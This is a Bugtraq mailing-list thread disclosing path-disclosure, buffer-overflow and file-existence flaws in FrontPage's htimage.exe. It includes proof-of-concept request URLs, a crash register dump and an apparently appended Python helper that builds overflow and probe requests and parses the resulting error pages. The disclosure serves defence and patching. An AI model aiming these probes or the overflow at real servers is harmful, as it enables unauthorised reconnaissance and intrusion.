Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: cyberiad () CYBERUS CA (The Cyberiad)
Date: Wed, 19 Apr 2000 08:08:25 -0400
Hello,

I confirmed the 742 A's caused a page fault in KERNEL32.DLL at 0167:bff87ede under FP 3.0.2.1105, installed with PWS under Windows 98 (PWS.EXE Version 4.02.0690). However, this length did not force A's into the EIP. Instead the stack pointer is corrupted, now pointing to invalid memory (which caused the page fault). The relationship of the corrupted stack pointer to the input overflow data is unclear (it's not 0x41414141), so I'll have to do some more reverse engineering; I did try longer strings with the same result.

As well, the file existence test listed under Problem #3 works for files outside of the webroot but on the same volume. For example, if your webroot is at d:\Inetpub\wwwroot, the request

http://server/cgi-bin/htimage.exe/test.doc?0,0

will test for the existence of a file d:\test.doc. Note however, that htimage.exe checks for the file d:\Inetpub\wwwroot\test.doc first and then d:\test.doc. It does not allow me to test for file existence on other volumes.

Cyberiad

----- Original Message -----
From: Narrow <narrow () HOBBITON ORG>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Tuesday, April 18, 2000 2:40 PM
Subject: More vulnerabilities in FP
[ Reader(s), please Cc: your comments/etc to narrow () hobbiton org ]
--------------------------------------------------------------------------------

-------[ Legion2000 - Russian Security Team (ADV-150400#1) ]-------
www.legion2000.cc

---- INFORMATION ----
Program Name  : CERN Image Map Dispatcher
Discovered By : Narrow (narrow () hobbiton org)
---------------------

Problem Description
~~~~~~~~~~~~~~~~~~~
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs in "htimage.exe":
1) Gives us the full path to the root directory
2) Simple buffer overflow
3) Allows us to access files.

Problem #1
~~~~~~~~~~
Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability against some servers, all were vulnerable!

Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926, 3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we have permission to execute "htimage.exe" + if "htimage.exe" exists).

To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's installed by default) and permission to execute it. That's why only Windows is vulnerable; Unix based systems can't execute "*.exe" files. If we access "htimage.exe" using our favorite web browser like:

http://server/cgi-bin/htimage.exe/linux?0,0

we get this error:
------------------------------------------------------------------------------------
Error
Error calling HTImage: Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
------------------------------------------------------------------------------------

Now we know that the path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/".

Problem #2
~~~~~~~~~~
Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98

"htimage.exe" buffer overflows if we access it like:

http://server/cgi-bin/htimage.exe/<741 A's>?0,0

------------------------------------------------------------------------------------
HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141.
Registers:
EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
------------------------------------------------------------------------------------
<Server still running> + <500 Server Error>

First remote FrontPage exploit?

Problem #3
~~~~~~~~~~
It's not a serious bug. Using "htimage.exe" we can access files on server, but we can't read them. Accessing "htimage.exe" like:

http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0

outputs:
------------------------------------------------------------------------------------
Error
Error calling HTImage: HTImage.c: Syntax error at line 1
Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string)
------------------------------------------------------------------------------------

NOTE: Accessing "/_vti_pvt/service.pwd" outputs: 403 Forbidden

Solution
~~~~~~~~
1) Remove "htimage.exe".
2) Do not use FrontPage, simple enough :)

Comments
~~~~~~~~
Sorry for my bad English, not my mother/father language ;)
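The three behaviours discussed in this thread (the path leak in the "config file not found" error, the file-existence oracle given by which error htimage.exe returns, and the question of whether the overflow actually lands input in EIP) can be turned into a small offline triage helper. The following is an added example, not code from either message above or from FrontPage: the function names (probe_url, overflow_url, classify, extract_webroot, parse_registers, eip_controlled) are my own, and the response bodies and register dump are constructed samples modelled on the error texts and fault dialog quoted in the advisory, not captures from a live server.

```python
import re

# Constructed sample responses, modelled on the two htimage.exe error pages
# quoted in the advisory (not captured from a live server).
MISSING_FILE_BODY = """Error
Error calling HTImage: Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
"""

EXISTING_FILE_BODY = """Error
Error calling HTImage: HTImage.c: Syntax error at line 1
Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string)
"""

# Constructed Windows 9x style fault dialog, using the register values from the advisory.
CRASH_DUMP = """HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141.
Registers:
EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
"""


def probe_url(server, path):
    """Build the htimage.exe request for a path; '?0,0' supplies the click coordinates htimage expects."""
    return "http://%s/cgi-bin/htimage.exe/%s?0,0" % (server, path.lstrip("/"))


def overflow_url(server, length=741):
    """The Problem #2 request: a long run of 'A's in the path component."""
    return probe_url(server, "A" * length)


def classify(body):
    """Turn an htimage error page into an existence verdict.

    'missing': the config-file-not-found error, which also lists every path tried
    'exists' : the map-file syntax error, which means the file was opened and parsed
    'unknown': anything else (403, 500, a real image map, ...)
    """
    m = re.search(r"tried the following:\s*(.*)", body, re.S)
    if m:
        return {"status": "missing", "tried": m.group(1).split()}
    if "Syntax error at line" in body and "Bad field name" in body:
        return {"status": "exists", "tried": []}
    return {"status": "unknown", "tried": []}


def extract_webroot(body, requested):
    """Recover the document root from the first candidate path of a 'missing' response.

    The reply in the thread notes that htimage tries <webroot>/<path> first and then
    <volume root>/<path>; the first candidate therefore carries the webroot prefix.
    """
    info = classify(body)
    if info["status"] != "missing" or not info["tried"]:
        return None
    first, suffix = info["tried"][0], requested.lstrip("/")
    if first.endswith(suffix):
        return first[: len(first) - len(suffix)]
    return None


def parse_registers(dump):
    """Parse 'NAME=hex' pairs from a Windows 9x fault dialog into ints."""
    return {name: int(val, 16)
            for name, val in re.findall(r"\b([A-Z]{2,5})=([0-9a-fA-F]{4,8})\b", dump)}


def eip_controlled(dump, filler=b"A"):
    """True when EIP holds four copies of the filler byte, i.e. the overflow reached the return address.

    The reply in the thread reports the other outcome on FP 3.0.2.1105: a fault inside
    KERNEL32 with a corrupted stack pointer, for which this check is False and the crash
    needs further reverse engineering before it can be called exploitable.
    """
    regs = parse_registers(dump)
    return regs.get("EIP") == int.from_bytes(filler * 4, "big")


if __name__ == "__main__":
    print(probe_url("server", "_vti_pvt/service.pwd"))
    print(classify(MISSING_FILE_BODY), extract_webroot(MISSING_FILE_BODY, "linux"))
    print(classify(EXISTING_FILE_BODY))
    print("EIP controlled:", eip_controlled(CRASH_DUMP))
```

The oracle only works because the two failure modes produce different error text: a file that cannot be opened yields the "tried the following" list (and leaks the candidate paths), while a file that opens but is not an image map fails later in the parser. A 403 from the web server on the same path, as the advisory notes for /_vti_pvt/service.pwd, says nothing about existence, which is why the helper reports it as "unknown" rather than "missing".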